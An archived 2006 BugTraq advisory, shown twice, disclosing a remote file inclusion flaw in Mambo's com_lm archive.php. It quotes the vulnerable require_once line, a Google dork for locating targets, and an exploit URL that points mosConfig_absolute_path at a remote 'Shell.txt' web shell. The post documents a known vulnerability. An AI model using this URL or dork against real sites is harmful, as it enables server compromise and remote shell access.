BugTraq
Back to list
|
Post reply
Mambo com_lm component (archive.php) Remote File Include Vulnerabilities
Aug 16 2006 09:36AM
crackers_child sibersavascilar com
!!!!!!!!!WWW.SiBERSAVASCiLAR.COM!!!!!!!!!
------------------------------------------------------------------------
--------
Title : Mambo com_lm component (archive.php) Remote File Include Vulnerabilities
------------------------------------------------------------------------
--------
#Author: Crackers_Child
#cont@ct: crackers_child (at) sibersavascilar (dot) com [email concealed]
------------------------------------------------------------------------
--------
Google Dorks : inurl:"/com_lm/"
------------------------- -------------------------------------------------------
Application : com_lm Component of Mambo
------------------------------------------------------------------------
--------
------------------------------------------------------------------------
--------
Bug
in archive.php
--
// Change the $LM_PATH variable in the eu_config.inc.php file in this directory.
require_once($GLOBALS['mosConfig_absolute_path']."/components/com_lm/pub
lic_config.inc.php");
--
------------------------------------------------------------------------
--------
Exploit:
http://[target]/[mambo_path]/components/com_lm/archive.php?mosConfig_abs
olute_path=Shell.txt?
------------------------------------------------------------------------
--------
greets:
X_ALPEREN_X,Root_MOr And All Other Friends
------------------------------------------------------------------------
--------
--------------------------------- [ WWW.SiBERSAVASCiLAR.COM ] --------------------------------------
[ reply ]
Privacy Statement
Copyright 2010, SecurityFocus
------------------------------------------------------------------------
--------
Title : Mambo com_lm component (archive.php) Remote File Include Vulnerabilities
------------------------------------------------------------------------
--------
#Author: Crackers_Child
#cont@ct: crackers_child (at) sibersavascilar (dot) com [email concealed]
------------------------------------------------------------------------
--------
Google Dorks : inurl:"/com_lm/"
------------------------- -------------------------------------------------------
Application : com_lm Component of Mambo
------------------------------------------------------------------------
--------
------------------------------------------------------------------------
--------
Bug
in archive.php
--
// Change the $LM_PATH variable in the eu_config.inc.php file in this directory.
require_once($GLOBALS['mosConfig_absolute_path']."/components/com_lm/pub
lic_config.inc.php");
--
------------------------------------------------------------------------
--------
Exploit:
http://[target]/[mambo_path]/components/com_lm/archive.php?mosConfig_abs
olute_path=Shell.txt?
------------------------------------------------------------------------
--------
greets:
X_ALPEREN_X,Root_MOr And All Other Friends
------------------------------------------------------------------------
--------
--------------------------------- [ WWW.SiBERSAVASCiLAR.COM ] --------------------------------------
[ reply ]